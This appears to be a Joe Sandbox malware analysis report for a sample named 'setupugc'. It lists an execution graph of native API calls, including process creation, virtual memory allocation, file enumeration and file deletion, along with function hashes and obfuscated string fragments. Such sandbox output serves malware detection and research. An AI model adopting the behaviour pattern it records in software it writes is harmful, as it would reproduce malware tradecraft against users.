                          • Instruction Fuzzy Hash: 07417CB1A087069FC310DF28C494A1BBBE4BB89318F04492EF588DB361D771E906CB96

                          Execution Graph

                          Execution Coverage:2.6%
                          Dynamic/Decrypted Code Coverage:4.1%
                          Signature Coverage:1.5%
                          Total number of Nodes:464
                          Total number of Limit Nodes:75
                          execution_graph 98008 3932ad0 LdrInitializeThunk 98009 2e59ba0 98011 2e59baf 98009->98011 98010 2e59bf0 98011->98010 98012 2e59bdd CreateThread 98011->98012 98013 2e60ce0 98014 2e60ce1 98013->98014 98019 2e64470 98014->98019 98016 2e60d18 98017 2e60d4c PostThreadMessageW 98016->98017 98018 2e60d5d 98016->98018 98017->98018 98021 2e64494 98019->98021 98020 2e6449b 98020->98016 98021->98020 98022 2e644e7 98021->98022 98023 2e644d0 LdrLoadDll 98021->98023 98022->98016 98023->98022 98024 2e66ca0 98025 2e66cca 98024->98025 98028 2e67e70 98025->98028 98027 2e66cf4 98029 2e67e8d 98028->98029 98035 2e789f0 98029->98035 98031 2e67edd 98032 2e67ee4 98031->98032 98040 2e78ad0 98031->98040 98032->98027 98034 2e67f0d 98034->98027 98036 2e78a8b 98035->98036 98038 2e78a1b 98035->98038 98045 3932f30 LdrInitializeThunk 98036->98045 98037 2e78ac4 98037->98031 98038->98031 98041 2e78b84 98040->98041 98042 2e78b02 98040->98042 98046 3932d10 LdrInitializeThunk 98041->98046 98042->98034 98043 2e78bc9 98043->98034 98045->98037 98046->98043 98047 2e67260 98048 2e672d2 98047->98048 98049 2e67278 98047->98049 98049->98048 98051 2e6b1b0 98049->98051 98052 2e6b1d6 98051->98052 98053 2e6b409 98052->98053 98078 2e796c0 98052->98078 98053->98048 98055 2e6b24c 98055->98053 98081 2e7c660 98055->98081 98057 2e6b26b 98057->98053 98058 2e6b342 98057->98058 98087 2e78900 98057->98087 98061 2e65a40 LdrInitializeThunk 98058->98061 98066 2e6b361 98058->98066 98061->98066 98062 2e6b2d6 98062->98053 98063 2e6b32a 98062->98063 98067 2e6b308 98062->98067 98091 2e65a40 98062->98091 98095 2e68040 98063->98095 98065 2e6b3f1 98070 2e68040 LdrInitializeThunk 98065->98070 98066->98065 98099 2e78470 98066->98099 98114 2e746c0 LdrInitializeThunk 98067->98114 98074 2e6b3ff 98070->98074 98073 2e6b3c8 98104 2e78520 98073->98104 98074->98048 98076 2e6b3e2 98109 2e78680 98076->98109 98079 2e796dd 98078->98079 98080 2e796ee CreateProcessInternalW 98079->98080 98080->98055 98082 2e7c5d0 98081->98082 98083 2e7c62d 98082->98083 98115 2e7b450 98082->98115 98083->98057 98085 2e7c60a 98118 2e7b370 98085->98118 98088 2e7891d 98087->98088 98127 3932c0a 98088->98127 98089 2e6b2cd 98089->98058 98089->98062 98092 2e65a55 98091->98092 98093 2e78ad0 LdrInitializeThunk 98092->98093 98094 2e65a7e 98093->98094 98094->98067 98096 2e68053 98095->98096 98130 2e78800 98096->98130 98098 2e6807e 98098->98048 98100 2e784f0 98099->98100 98102 2e7849e 98099->98102 98136 39339b0 LdrInitializeThunk 98100->98136 98101 2e78515 98101->98073 98102->98073 98105 2e7859d 98104->98105 98106 2e7854b 98104->98106 98137 3934340 LdrInitializeThunk 98105->98137 98106->98076 98107 2e785c2 98107->98076 98110 2e78700 98109->98110 98112 2e786ae 98109->98112 98138 3932fb0 LdrInitializeThunk 98110->98138 98111 2e78725 98111->98065 98112->98065 98114->98063 98121 2e795e0 98115->98121 98117 2e7b46b 98117->98085 98124 2e79630 98118->98124 98120 2e7b389 98120->98083 98122 2e795fd 98121->98122 98123 2e7960e RtlAllocateHeap 98122->98123 98123->98117 98125 2e7964a 98124->98125 98126 2e7965b RtlFreeHeap 98125->98126 98126->98120 98128 3932c11 98127->98128 98129 3932c1f LdrInitializeThunk 98127->98129 98128->98089 98129->98089 98131 2e78881 98130->98131 98132 2e7882e 98130->98132 98135 3932dd0 LdrInitializeThunk 98131->98135 98132->98098 98133 2e788a6 98133->98098 98135->98133 98136->98101 98137->98107 98138->98111 98139 2e6c520 98141 2e6c549 98139->98141 98140 2e6c64d 98141->98140 98142 2e6c5f3 FindFirstFileW 98141->98142 98142->98140 98144 2e6c60e 98142->98144 98143 2e6c634 FindNextFileW 98143->98144 98145 2e6c646 FindClose 98143->98145 98144->98143 98145->98140 98156 2e716a0 98157 2e716bc 98156->98157 98158 2e716e4 98157->98158 98159 2e716f8 98157->98159 98160 2e792d0 NtClose 98158->98160 98166 2e792d0 98159->98166 98162 2e716ed 98160->98162 98163 2e71701 98169 2e7b490 RtlAllocateHeap 98163->98169 98165 2e7170c 98167 2e792ea 98166->98167 98168 2e792fb NtClose 98167->98168 98168->98163 98169->98165 98170 2e63033 98175 2e67cc0 98170->98175 98173 2e792d0 NtClose 98174 2e6305f 98173->98174 98176 2e67cda 98175->98176 98180 2e63043 98175->98180 98181 2e789a0 98176->98181 98179 2e792d0 NtClose 98179->98180 98180->98173 98180->98174 98182 2e789bd 98181->98182 98185 39335c0 LdrInitializeThunk 98182->98185 98183 2e67daa 98183->98179 98185->98183 98186 2e71231 98198 2e79140 98186->98198 98188 2e71285 98190 2e792d0 NtClose 98188->98190 98189 2e71270 98192 2e792d0 NtClose 98189->98192 98195 2e7128e 98190->98195 98191 2e71252 98191->98188 98191->98189 98193 2e71279 98192->98193 98194 2e712c5 98195->98194 98196 2e7b370 RtlFreeHeap 98195->98196 98197 2e712b9 98196->98197 98199 2e791e7 98198->98199 98201 2e7916b 98198->98201 98200 2e791fd NtReadFile 98199->98200 98200->98191 98201->98191 98202 2e6f770 98203 2e6f7d4 98202->98203 98231 2e661d0 98203->98231 98205 2e6f90e 98206 2e6f907 98206->98205 98238 2e662e0 98206->98238 98208 2e6fab3 98209 2e6f98a 98209->98208 98210 2e6fac2 98209->98210 98242 2e6f550 98209->98242 98211 2e792d0 NtClose 98210->98211 98213 2e6facc 98211->98213 98214 2e6f9c6 98214->98210 98215 2e6f9d1 98214->98215 98216 2e7b450 RtlAllocateHeap 98215->98216 98217 2e6f9fa 98216->98217 98218 2e6fa03 98217->98218 98219 2e6fa19 98217->98219 98221 2e792d0 NtClose 98218->98221 98251 2e6f440 CoInitialize 98219->98251 98223 2e6fa0d 98221->98223 98222 2e6fa27 98253 2e78da0 98222->98253 98225 2e6faa2 98226 2e792d0 NtClose 98225->98226 98227 2e6faac 98226->98227 98228 2e7b370 RtlFreeHeap 98227->98228 98228->98208 98229 2e6fa45 98229->98225 98230 2e78da0 LdrInitializeThunk 98229->98230 98230->98229 98232 2e66203 98231->98232 98233 2e66227 98232->98233 98257 2e78e40 98232->98257 98233->98206 98235 2e6624a 98235->98233 98236 2e792d0 NtClose 98235->98236 98237 2e662ca 98236->98237 98237->98206 98239 2e66305 98238->98239 98262 2e78c20 98239->98262 98243 2e6f56c 98242->98243 98244 2e64470 LdrLoadDll 98243->98244 98246 2e6f58a 98244->98246 98245 2e6f593 98245->98214 98246->98245 98247 2e64470 LdrLoadDll 98246->98247 98248 2e6f65e 98247->98248 98249 2e64470 LdrLoadDll 98248->98249 98250 2e6f6b8 98248->98250 98249->98250 98250->98214 98252 2e6f4a5 98251->98252 98252->98222 98254 2e78dba 98253->98254 98267 3932ba0 LdrInitializeThunk 98254->98267 98255 2e78dea 98255->98229 98258 2e78e5a 98257->98258 98261 3932ca0 LdrInitializeThunk 98258->98261 98259 2e78e86 98259->98235 98261->98259 98263 2e78c3a 98262->98263 98266 3932c60 LdrInitializeThunk 98263->98266 98264 2e66379 98264->98209 98266->98264 98267->98255 98268 2e68730 98269 2e68735 98268->98269 98270 2e68721 98268->98270 98269->98270 98272 2e66ec0 LdrInitializeThunk LdrInitializeThunk 98269->98272 98272->98270 98273 2e788b0 98274 2e788cd 98273->98274 98277 3932df0 LdrInitializeThunk 98274->98277 98275 2e788f5 98277->98275 98278 2e70070 98279 2e7008d 98278->98279 98280 2e64470 LdrLoadDll 98279->98280 98281 2e700ab 98280->98281 98282 2e79230 98283 2e792a7 98282->98283 98285 2e7925b 98282->98285 98284 2e792bd NtDeleteFile 98283->98284 98286 2e71a30 98291 2e71a49 98286->98291 98287 2e71ad9 98288 2e71a91 98289 2e7b370 RtlFreeHeap 98288->98289 98290 2e71aa1 98289->98290 98291->98287 98291->98288 98292 2e71ad4 98291->98292 98293 2e7b370 RtlFreeHeap 98292->98293 98293->98287 98294 2e75fb0 98295 2e7600a 98294->98295 98297 2e76017 98295->98297 98298 2e739d0 98295->98298 98305 2e7b2e0 98298->98305 98300 2e73b1e 98300->98297 98301 2e73a11 98301->98300 98302 2e64470 LdrLoadDll 98301->98302 98304 2e73a57 98302->98304 98303 2e73aa0 Sleep 98303->98304 98304->98300 98304->98303 98308 2e79430 98305->98308 98307 2e7b311 98307->98301 98309 2e794c5 98308->98309 98311 2e7945b 98308->98311 98310 2e794db NtAllocateVirtualMemory 98309->98310 98310->98307 98311->98307 98312 2e78730 98313 2e787c2 98312->98313 98314 2e7875e 98312->98314 98317 3932ee0 LdrInitializeThunk 98313->98317 98315 2e787f3 98317->98315 98318 2e69b47 98319 2e69b5e 98318->98319 98320 2e69b63 98318->98320 98321 2e69b98 98320->98321 98322 2e7b370 RtlFreeHeap 98320->98322 98322->98321 98324 2e59c00 98326 2e59fe7 98324->98326 98325 2e5a3cc 98326->98325 98328 2e7afd0 98326->98328 98329 2e7aff6 98328->98329 98334 2e54200 98329->98334 98331 2e7b002 98333 2e7b03b 98331->98333 98337 2e75540 98331->98337 98333->98325 98341 2e63130 98334->98341 98336 2e5420d 98336->98331 98338 2e755a2 98337->98338 98340 2e755af 98338->98340 98352 2e61920 98338->98352 98340->98333 98342 2e6314d 98341->98342 98344 2e63166 98342->98344 98345 2e79d10 98342->98345 98344->98336 98347 2e79d2a 98345->98347 98346 2e79d59 98346->98344 98347->98346 98348 2e78900 LdrInitializeThunk 98347->98348 98349 2e79db6 98348->98349 98350 2e7b370 RtlFreeHeap 98349->98350 98351 2e79dcc 98350->98351 98351->98344 98353 2e6195b 98352->98353 98368 2e67dd0 98353->98368 98355 2e61963 98356 2e61c30 98355->98356 98357 2e7b450 RtlAllocateHeap 98355->98357 98356->98340 98358 2e61979 98357->98358 98359 2e7b450 RtlAllocateHeap 98358->98359 98360 2e6198a 98359->98360 98361 2e7b450 RtlAllocateHeap 98360->98361 98362 2e61998 98361->98362 98367 2e61a2c 98362->98367 98383 2e66930 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98362->98383 98364 2e64470 LdrLoadDll 98365 2e61be2 98364->98365 98379 2e77e80 98365->98379 98367->98364 98369 2e67dfc 98368->98369 98370 2e67cc0 2 API calls 98369->98370 98371 2e67e1f 98370->98371 98372 2e67e41 98371->98372 98373 2e67e29 98371->98373 98374 2e67e5d 98372->98374 98377 2e792d0 NtClose 98372->98377 98375 2e67e34 98373->98375 98376 2e792d0 NtClose 98373->98376 98374->98355 98375->98355 98376->98375 98378 2e67e53 98377->98378 98378->98355 98380 2e77ee2 98379->98380 98382 2e77eef 98380->98382 98384 2e61c40 98380->98384 98382->98356 98383->98367 98400 2e680a0 98384->98400 98386 2e621a5 98386->98382 98387 2e61c60 98387->98386 98404 2e71070 98387->98404 98390 2e61e6f 98392 2e7c660 2 API calls 98390->98392 98391 2e61cbb 98391->98386 98407 2e7c530 98391->98407 98394 2e61e84 98392->98394 98393 2e68040 LdrInitializeThunk 98396 2e61ed1 98393->98396 98394->98396 98412 2e60770 98394->98412 98396->98386 98396->98393 98398 2e60770 LdrInitializeThunk 98396->98398 98397 2e68040 LdrInitializeThunk 98399 2e62023 98397->98399 98398->98396 98399->98396 98399->98397 98401 2e680ad 98400->98401 98402 2e680d5 98401->98402 98403 2e680ce SetErrorMode 98401->98403 98402->98387 98403->98402 98405 2e7b2e0 NtAllocateVirtualMemory 98404->98405 98406 2e71091 98405->98406 98406->98391 98408 2e7c546 98407->98408 98409 2e7c540 98407->98409 98410 2e7b450 RtlAllocateHeap 98408->98410 98409->98390 98411 2e7c56c 98410->98411 98411->98390 98413 2e60792 98412->98413 98415 2e79550 98412->98415 98413->98399 98416 2e7956d 98415->98416 98419 3932c70 LdrInitializeThunk 98416->98419 98417 2e79595 98417->98413 98419->98417 98420 2e65ac0 98421 2e68040 LdrInitializeThunk 98420->98421 98422 2e65af0 98421->98422 98425 2e67fc0 98422->98425 98424 2e65b15 98426 2e68004 98425->98426 98427 2e68025 98426->98427 98432 2e785d0 98426->98432 98427->98424 98429 2e68015 98430 2e68031 98429->98430 98431 2e792d0 NtClose 98429->98431 98430->98424 98431->98427 98433 2e78650 98432->98433 98435 2e785fe 98432->98435 98437 3934650 LdrInitializeThunk 98433->98437 98434 2e78675 98434->98429 98435->98429 98437->98434 98438 2e67080 98439 2e6709c 98438->98439 98442 2e670ef 98438->98442 98440 2e792d0 NtClose 98439->98440 98439->98442 98443 2e670b7 98440->98443 98441 2e67224 98442->98441 98449 2e66460 NtClose LdrInitializeThunk LdrInitializeThunk 98442->98449 98448 2e66460 NtClose LdrInitializeThunk LdrInitializeThunk 98443->98448 98445 2e671fe 98445->98441 98450 2e66630 NtClose LdrInitializeThunk LdrInitializeThunk 98445->98450 98448->98442 98449->98445 98450->98441 98451 2e6ac80 98456 2e6a990 98451->98456 98453 2e6ac8d 98470 2e6a610 98453->98470 98455 2e6aca9 98457 2e6a9b5 98456->98457 98481 2e682b0 98457->98481 98460 2e6ab03 98460->98453 98462 2e6ab1a 98462->98453 98463 2e6ab11 98463->98462 98465 2e6ac07 98463->98465 98500 2e6a060 98463->98500 98467 2e6ac6a 98465->98467 98509 2e6a3d0 98465->98509 98468 2e7b370 RtlFreeHeap 98467->98468 98469 2e6ac71 98468->98469 98469->98453 98471 2e6a622 98470->98471 98478 2e6a62d 98470->98478 98472 2e7b450 RtlAllocateHeap 98471->98472 98472->98478 98473 2e6a650 98473->98455 98474 2e682b0 GetFileAttributesW 98474->98478 98475 2e6a962 98476 2e6a977 98475->98476 98477 2e7b370 RtlFreeHeap 98475->98477 98476->98455 98477->98476 98478->98473 98478->98474 98478->98475 98479 2e6a060 RtlFreeHeap 98478->98479 98480 2e6a3d0 RtlFreeHeap 98478->98480 98479->98478 98480->98478 98482 2e682d1 98481->98482 98483 2e682d8 GetFileAttributesW 98482->98483 98484 2e682e3 98482->98484 98483->98484 98484->98460 98485 2e732c0 98484->98485 98486 2e732ce 98485->98486 98487 2e732d5 98485->98487 98486->98463 98488 2e64470 LdrLoadDll 98487->98488 98489 2e7330a 98488->98489 98490 2e73319 98489->98490 98513 2e72d80 LdrLoadDll 98489->98513 98492 2e7b450 RtlAllocateHeap 98490->98492 98496 2e734c4 98490->98496 98493 2e73332 98492->98493 98494 2e734ba 98493->98494 98493->98496 98497 2e7334e 98493->98497 98495 2e7b370 RtlFreeHeap 98494->98495 98494->98496 98495->98496 98496->98463 98497->98496 98498 2e7b370 RtlFreeHeap 98497->98498 98499 2e734ae 98498->98499 98499->98463 98501 2e6a086 98500->98501 98514 2e6daa0 98501->98514 98503 2e6a0f8 98505 2e6a280 98503->98505 98506 2e6a116 98503->98506 98504 2e6a265 98504->98463 98505->98504 98507 2e69f20 RtlFreeHeap 98505->98507 98506->98504 98519 2e69f20 98506->98519 98507->98505 98510 2e6a3f6 98509->98510 98511 2e6daa0 RtlFreeHeap 98510->98511 98512 2e6a47d 98511->98512 98512->98465 98513->98490 98516 2e6dac4 98514->98516 98515 2e6dace 98515->98503 98516->98515 98517 2e7b370 RtlFreeHeap 98516->98517 98518 2e6db11 98517->98518 98518->98503 98520 2e69f3d 98519->98520 98523 2e6db20 98520->98523 98522 2e6a043 98522->98506 98524 2e6db44 98523->98524 98525 2e6dbee 98524->98525 98526 2e7b370 RtlFreeHeap 98524->98526 98525->98522 98526->98525 98527 2e621c0 98528 2e78900 LdrInitializeThunk 98527->98528 98529 2e621f6 98528->98529 98532 2e79360 98529->98532 98531 2e6220b 98533 2e793f2 98532->98533 98534 2e7938e 98532->98534 98537 3932e80 LdrInitializeThunk 98533->98537 98534->98531 98535 2e79423 98535->98531 98537->98535 98538 2e78200 98539 2e7821a 98538->98539 98540 2e7822b RtlDosPathNameToNtPathName_U 98539->98540 98543 2e5b490 98544 2e7b2e0 NtAllocateVirtualMemory 98543->98544 98545 2e5cb01 98543->98545 98544->98545 98546 2e758d0 98547 2e75934 98546->98547 98548 2e7596b 98547->98548 98551 2e710e0 98547->98551 98550 2e7594d 98552 2e710e2 98551->98552 98553 2e711e1 98552->98553 98554 2e71285 98552->98554 98555 2e71270 98552->98555 98553->98550 98556 2e792d0 NtClose 98554->98556 98557 2e792d0 NtClose 98555->98557 98560 2e7128e 98556->98560 98558 2e71279 98557->98558 98558->98550 98559 2e712c5 98559->98550 98560->98559 98561 2e7b370 RtlFreeHeap 98560->98561 98562 2e712b9 98561->98562 98562->98550 98563 2e78fd0 98564 2e79087 98563->98564 98566 2e78fff 98563->98566 98565 2e7909d NtCreateFile 98564->98565 98572 2e7c590 98573 2e7b370 RtlFreeHeap 98572->98573 98574 2e7c5a5 98573->98574 98575 2e62698 98576 2e626b5 98575->98576 98577 2e661d0 2 API calls 98576->98577 98578 2e626c0 98577->98578

                          Executed Functions

                          Function 02E59C00 Relevance: 37.9, Strings: 30, Instructions: 423COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 26 2e59c00-2e59fe5 27 2e59ff6-2e5a002 26->27 28 2e5a004-2e5a00e 27->28 29 2e5a010-2e5a01a 27->29 28->27 31 2e5a02b-2e5a037 29->31 32 2e5a039-2e5a048 31->32 33 2e5a04a 31->33 32->31 35 2e5a051-2e5a055 33->35 36 2e5a057-2e5a081 35->36 37 2e5a083-2e5a09c 35->37 36->35 37->37 38 2e5a09e 37->38 39 2e5a0a5-2e5a0be 38->39 39->39 40 2e5a0c0 39->40 41 2e5a0c7-2e5a0ce 40->41 42 2e5a100-2e5a10a 41->42 43 2e5a0d0-2e5a0fe 41->43 44 2e5a11b-2e5a124 42->44 43->41 45 2e5a126-2e5a138 44->45 46 2e5a13a-2e5a13e 44->46 45->44 47 2e5a167-2e5a16d 46->47 48 2e5a140-2e5a165 46->48 50 2e5a16f-2e5a187 47->50 51 2e5a189-2e5a192 47->51 48->46 50->47 52 2e5a260-2e5a26a 51->52 53 2e5a198-2e5a19b 51->53 54 2e5a26c-2e5a28b 52->54 55 2e5a29e-2e5a2a8 52->55 56 2e5a1a1-2e5a1ba 53->56 57 2e5a28d-2e5a296 54->57 58 2e5a29c 54->58 59 2e5a2b9-2e5a2c5 55->59 56->56 60 2e5a1bc-2e5a1c3 56->60 57->58 58->52 61 2e5a2c7-2e5a2d4 59->61 62 2e5a2e1-2e5a2e8 59->62 63 2e5a1c5-2e5a1f6 60->63 64 2e5a1f8-2e5a207 60->64 65 2e5a2d6-2e5a2dc 61->65 66 2e5a2df 61->66 69 2e5a2ee-2e5a307 62->69 70 2e5a409-2e5a413 62->70 63->60 67 2e5a209 64->67 68 2e5a20b-2e5a215 64->68 65->66 66->59 67->52 73 2e5a226-2e5a232 68->73 69->69 74 2e5a309-2e5a313 69->74 71 2e5a424-2e5a430 70->71 75 2e5a440-2e5a44a 71->75 76 2e5a432-2e5a43e 71->76 78 2e5a234-2e5a240 73->78 79 2e5a242-2e5a248 73->79 77 2e5a324-2e5a330 74->77 80 2e5a45b-2e5a464 75->80 76->71 83 2e5a332-2e5a33b 77->83 84 2e5a348-2e5a352 77->84 78->73 85 2e5a24c-2e5a259 79->85 89 2e5a466-2e5a479 80->89 90 2e5a47b-2e5a485 80->90 86 2e5a346 83->86 87 2e5a33d-2e5a343 83->87 88 2e5a363-2e5a36c 84->88 85->85 91 2e5a25b 85->91 86->77 87->86 93 2e5a36e-2e5a37a 88->93 94 2e5a38a-2e5a394 88->94 89->80 95 2e5a496-2e5a4a0 90->95 91->51 97 2e5a37c-2e5a382 93->97 98 2e5a388 93->98 99 2e5a3a5-2e5a3b1 94->99 100 2e5a4a2-2e5a4cc 95->100 101 2e5a4ce-2e5a4d8 95->101 97->98 98->88 103 2e5a3c7 call 2e7afd0 99->103 104 2e5a3b3-2e5a3c5 99->104 100->95 108 2e5a3cc-2e5a3d6 103->108 107 2e5a396-2e5a39f 104->107 107->99 109 2e5a3e7-2e5a3f3 108->109 109->70 110 2e5a3f5-2e5a407 109->110 110->109
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $-$&$)$,$-$4$5$9$;$E$Er$HU$L$N$N$X)$Y$Y4$[$a$a:M$e$f($h|$j$n7$t4$td$~o$H
                          • API String ID: 0-1478878621
                          • Opcode ID: 05b0d108dcaff571172e3c0be31c892bd0dca95fae81e7ce33d3ae19d3653c47
                          • Instruction ID: 0e25114f069cbb40762476f150edea5e2154826dc5ca69b5e312db8fb0b3c473
                          • Opcode Fuzzy Hash: 05b0d108dcaff571172e3c0be31c892bd0dca95fae81e7ce33d3ae19d3653c47
                          • Instruction Fuzzy Hash: DD3289B4A55228CBEB24CF45C9987DDBBB2BF85308F1092E9D5496B380C7B91A85CF41
                          Function 02E6C520 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E6C604
                          • FindNextFileW.KERNELBASE(?,00000010), ref: 02E6C63F
                          • FindClose.KERNELBASE(?), ref: 02E6C64A
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNext
                          • String ID:
                          • API String ID: 3541575487-0
                          • Opcode ID: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                          • Instruction ID: 0bc584146204607acda072aa1086dcb2602865395b983ee076f8845e892acf5d
                          • Opcode Fuzzy Hash: fa6dc311ed47ccb88f5a2f5c31066e8fc29bd714adbf69b4eb893539495236bf
                          • Instruction Fuzzy Hash: AB31A771980308BBDB20DB64CC48FFF777D9B44B48F10E459B948A7180E770AA858BA4
                          Function 02E78FD0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?,?,?), ref: 02E790CE
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                          • Instruction ID: 10a140dc0b084988cd9388cda9ece8eec578b707003d1c89ad4050d23221d6df
                          • Opcode Fuzzy Hash: 67770762bfd51f78d82aa628fda4528e784f95911ec6b29247aadbff0f17165e
                          • Instruction Fuzzy Hash: 1A31BFB5A00648ABDB14DF98D881EEFB7F9AF88304F108219F919A7344D770A951CFA0
                          Function 02E79140 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtReadFile.NTDLL(?,?,?,?,4A9873AC,?,?,?,?), ref: 02E79226
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                          • Instruction ID: 13f1e1b244ace87a867832975c04e9a897eaccff844b6157312f2c465e40c742
                          • Opcode Fuzzy Hash: 5fb8de2c51325e33cf20a958726c354214131b0131cf036008bcef2f6367b8c1
                          • Instruction Fuzzy Hash: 4631D5B5A40248ABDB14DF98D841EEFB7B9AF88704F108219F919A7344D774A911CFA1
                          Function 02E79430 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(02E61CBB,?,02E77EEF,00000000,4A9873AC,00003000,?,?,?,?,?,02E77EEF,02E61CBB), ref: 02E794F8
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                          • Instruction ID: 39bf3437268343c54bbdcc6bd6593051bfda9b9bfd027419aa5e02fa863b937f
                          • Opcode Fuzzy Hash: 454ab75c95555c584024a8b5792c731b3c966d355955c4dc466659014c8e5c51
                          • Instruction Fuzzy Hash: D02108B5A40249AFDB14DF98DC41FAFB7B9EF88304F108519FD08AB240E774A9118BA1
                          Function 02E79230 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0
                          • Opcode ID: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                          • Instruction ID: 3e04f6a6cf6355707f4ce963bee4fc1eafccfe26a2ad7914d3eeb72006427ba9
                          • Opcode Fuzzy Hash: 63de4ea6af3ddc3236bdf96bac0b669bb223df6dc87bc3ba1add14a003f8f1b5
                          • Instruction Fuzzy Hash: 2D1151715507096BD720EB64DC45FAF77ADDF85714F108119F908AB280EB756A018BE1
                          Function 02E792D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02E79304
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                          • Instruction ID: 784716dd698b96c47f006cedf00352d5e2ca06e5ac6eb2d4e9044890773fe8b6
                          • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                          • Instruction Fuzzy Hash: E5E046362506147BD620BA6ADC00F9B77ADEBC5714F008419FA18AB240C672B9108BA4
                          Function 03934340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                          • Instruction ID: 00b697b3417dd74e0bf95109ca0d8c4ac07c7e1c85739c882d52e16923c875e0
                          • Opcode Fuzzy Hash: 7bb66d0a0516bffacfb8777c521f039f2937489c0ce0f29bc1526516f7ebfd2e
                          • Instruction Fuzzy Hash: 2490023160990412A140B1584898946404997E0301B55C011E0424554C8B558A565361
                          Function 03934650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
